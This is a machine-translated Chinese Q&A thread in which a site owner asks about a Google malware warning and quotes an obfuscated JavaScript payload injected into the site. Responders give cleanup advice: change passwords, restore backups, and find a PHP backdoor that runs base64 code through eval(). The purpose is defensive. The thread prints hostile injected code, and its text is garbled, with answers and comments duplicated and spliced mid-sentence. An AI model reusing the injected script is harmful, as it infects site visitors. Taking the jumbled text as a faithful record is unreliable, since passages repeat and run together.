Fatal编程技术网
  • malware/
  • Malware 根据谷歌网站上的恶意软件,但我找不到它

Malware 根据谷歌网站上的恶意软件,但我找不到它

Malware 根据谷歌网站上的恶意软件,但我找不到它,malware,Malware,昨天当我来到我的一个网站时,我收到了谷歌的警告,我的网站上有恶意软件。我看了一下代码,确实有一些javascript不应该出现在那里。我在谷歌上搜索了一下,没有发现任何有用的东西。当我回到我的网站时,这些代码不见了,但是谷歌(当从搜索引擎访问网站时)和谷歌浏览器仍然给我一个警告,我的网站上有恶意软件 我查看了网站管理员工具,他们发现有几个页面存在问题。其中之一是。“网站管理员工具”中“恶意软件”下列出的代码为: <script type='text/javascript'>st="n

昨天当我来到我的一个网站时,我收到了谷歌的警告,我的网站上有恶意软件。我看了一下代码,确实有一些javascript不应该出现在那里。我在谷歌上搜索了一下,没有发现任何有用的东西。当我回到我的网站时,这些代码不见了,但是谷歌(当从搜索引擎访问网站时)和谷歌浏览器仍然给我一个警告,我的网站上有恶意软件

我查看了网站管理员工具,他们发现有几个页面存在问题。其中之一是。“网站管理员工具”中“恶意软件”下列出的代码为:

<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?
^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!
^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@
$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+
&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]
&+&~

st=“no3nen0orno3pno3rxstxpno3

rxnl”;Date&(a=[“a#%d]%b@%e#%c)%1非常感谢您提前提供帮助!
很可能您的主机已被自动工具泄露(密码被盗)。
此工具通常会在js文件中插入一些javascript,以使访问您页面的人感染恶意软件。您应该:


  • 更改您的密码
    • 

  • 恢复最近的受损备份
    • 

    很可能你的主机已经被一个自动工具破坏(密码被盗)。
此工具通常会在js文件中插入一些javascript,以使访问您页面的人感染恶意软件。您应该:
    

  • 更改您的密码
    • 

  • 恢复最近的受损备份
    • 

    

      

    • 从网页中删除恶意软件
      • 

    • 立即更改密码
      • 

    • 还要检查是否存在任何漏洞(跨站点脚本)和漏洞
      • 

    • 停用排名不高或来自知名来源的插件
      • 

    • 使用安全协议。查看StopBadware.org的
      • 

    • 注意你的日志文件
      • 

    • 随时了解最新的软件更新和修补程序。

      

      希望有帮助
      • 


        

          

        • 从网页中删除恶意软件
          • 

        • 立即更改密码
          • 

        • 还要检查是否存在任何漏洞(跨站点脚本)和漏洞
          • 

        • 停用排名不高或来自知名来源的插件
          • 

        • 使用安全协议。查看StopBadware.org的
          • 

        • 注意你的日志文件
          • 

        • 随时了解最新的软件更新和修补程序。

          

          希望有帮助
          • 

        如果代码再次出现,则攻击者会留下一些脚本,该脚本会根据请求运行感染过程。通常,该脚本会收到一个编码的恶意代码字符串(例如在
        base64
        中),对其进行解码并通过
        eval()
        执行。您应该找到该文件(很可能是一个PHP脚本)并将其删除。要查找它,请查看日志并搜索可疑请求(例如,单个
        POST
        请求,传输
        base64
        字符串是非常可疑的).
        如果代码再次出现,则攻击者会留下一些脚本,该脚本会根据请求运行感染过程。通常,该脚本会收到一个已编码的恶意代码字符串(例如在
        base64
        中),对其进行解码并通过
        eval()
        执行。您应该找到该文件(很可能是一个PHP脚本)并将其删除。要查找它,请查看日志并搜索可疑请求(例如,单个
        POST
        请求,传输
        base64
        字符串是非常可疑的).
        一旦你确定你的网站没有任何受感染的代码和内容,你就可以在谷歌上请求恶意软件审查。希望不会再发生在你身上!但是网站现在看起来很干净,对吗?我找不到任何东西,我已经更改了密码。只要你从这些点开始检查,你就可以从你的网站上关闭远程发布wp管理员在网页上。并请求恶意软件审查:在网站管理员工具主页上,选择您想要的网站。单击“运行状况”,然后单击“恶意软件”。单击“请求审查”。谢谢!这通常需要多长时间?更新:代码再次出现,但随后立即消失。我应该如何开始解决此问题?我不知道它在哪里它来自,刷新后就会消失:只要你确定你的网站没有任何受感染的代码和内容,你就可以在谷歌上请求恶意软件审查。希望它不会再发生在你身上!但网站现在看起来很干净,对吧?我找不到任何东西,我已经更改了密码。只要你从这些方面检查过,你就不能关闭你的wp管理员在网页上的远程发布。并请求恶意软件审查:在网站管理员工具主页上,选择你想要的网站。单击“运行状况”,然后单击“恶意软件”。单击“请求审查”。谢谢!这通常需要多长时间?更新:代码再次出现,但随后立即消失。我应该如何开始与此抗争?我不知道它来自何处,刷新时它会消失:SI已经这样做了。网站上是否有任何问题?请检查,因为我找不到它。:(非常感谢您!我已经这样做了。网站上是否有任何问题?请检查,因为我找不到它。)(提前非常感谢!